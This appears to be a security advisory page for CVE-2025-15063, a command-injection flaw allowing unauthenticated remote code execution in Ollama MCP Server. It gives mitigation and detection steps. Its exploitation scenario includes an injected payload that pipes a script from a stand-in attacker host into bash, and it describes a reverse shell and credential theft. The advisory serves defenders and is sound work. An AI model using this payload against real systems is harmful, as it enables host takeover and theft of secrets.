AI Threat Alert
CVE-2025-15063: Ollama: Command Injection enables RCE
UNKNOWN CISA: TRACK*Unauthenticated remote code execution in Ollama MCP Server via OS command injection (CWE-78) — an attacker with network access needs zero credentials to own the host. Any AI agent infrastructure running Ollama with its MCP server exposed is at critical risk right now. Immediately restrict network access to Ollama MCP Server to localhost or trusted subnets, and apply the vendor patch as soon as it is available.
Risk Assessment
Critical exploitability: no authentication required, network-reachable, trivial command injection technique (CWE-78). Ollama is widely deployed for self-hosted LLM inference in enterprise AI agent stacks and developer environments, increasing blast radius. The MCP (Model Context Protocol) integration layer is increasingly exposed in AI agent architectures, making this a high-probability target. Impact is full host compromise at service account privilege, enabling lateral movement, model exfiltration, and credential harvesting.
Severity & Risk
Recommended Action
1 step-
1) IMMEDIATE: Identify all Ollama MCP Server instances in your environment — check for processes listening on default ports and any Docker/container deployments. 2) Restrict network access: bind Ollama MCP Server to 127.0.0.1 or enforce firewall rules to allow only trusted source IPs. 3) Apply least privilege to the Ollama service account — it should not have access to credentials stores, cloud IAM roles, or sensitive filesystems. 4) Apply vendor patch (ZDI-26-020) immediately upon release; monitor the Ollama GitHub repo and ZDI advisory for patch availability. 5) Detection: monitor for anomalous child processes spawned by the Ollama process (especially shells, curl, wget, base64), and alert on outbound connections from the Ollama service account. 6) If MCP server functionality is not actively required, disable it until patched.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-15063?
Unauthenticated remote code execution in Ollama MCP Server via OS command injection (CWE-78) — an attacker with network access needs zero credentials to own the host. Any AI agent infrastructure running Ollama with its MCP server exposed is at critical risk right now. Immediately restrict network access to Ollama MCP Server to localhost or trusted subnets, and apply the vendor patch as soon as it is available.
Is CVE-2025-15063 actively exploited?
No confirmed active exploitation of CVE-2025-15063 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-15063?
1) IMMEDIATE: Identify all Ollama MCP Server instances in your environment — check for processes listening on default ports and any Docker/container deployments. 2) Restrict network access: bind Ollama MCP Server to 127.0.0.1 or enforce firewall rules to allow only trusted source IPs. 3) Apply least privilege to the Ollama service account — it should not have access to credentials stores, cloud IAM roles, or sensitive filesystems. 4) Apply vendor patch (ZDI-26-020) immediately upon release; monitor the Ollama GitHub repo and ZDI advisory for patch availability. 5) Detection: monitor for anomalous child processes spawned by the Ollama process (especially shells, curl, wget, base64), and alert on outbound connections from the Ollama service account. 6) If MCP server functionality is not actively required, disable it until patched.
What systems are affected by CVE-2025-15063?
This vulnerability affects the following AI/ML architecture patterns: model serving, agent frameworks, LLM inference infrastructure, MCP plugin ecosystems.
What is the CVSS score for CVE-2025-15063?
No CVSS score has been assigned yet.
Technical Details
NVD Description
Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27683.
Exploitation Scenario
An adversary scans internet-facing IP ranges for exposed Ollama MCP Server endpoints (common in dev/lab environments left accessible). They craft a malicious tool invocation request targeting the vulnerable execAsync method, injecting a payload such as '; curl https://attacker.com/implant.sh | bash' into the user-controlled string parameter. Because no authentication is enforced, the payload executes immediately as the Ollama service account. The attacker establishes a reverse shell, then enumerates environment variables for LLM API keys (OpenAI, Anthropic), cloud credentials, and RAG database connection strings — subsequently exfiltrating model artifacts and pivoting to connected AI infrastructure.
Weaknesses (CWE)
References
Timeline
Related Vulnerabilities
CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Code Execution CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Code Execution CVE-2025-2828 10.0 LangChain RequestsToolkit: SSRF exposes cloud metadata
Same attack type: Auth Bypass CVE-2025-53767 10.0 Azure OpenAI: SSRF EoP, no auth required (CVSS 10)
Same attack type: Auth Bypass CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Code Execution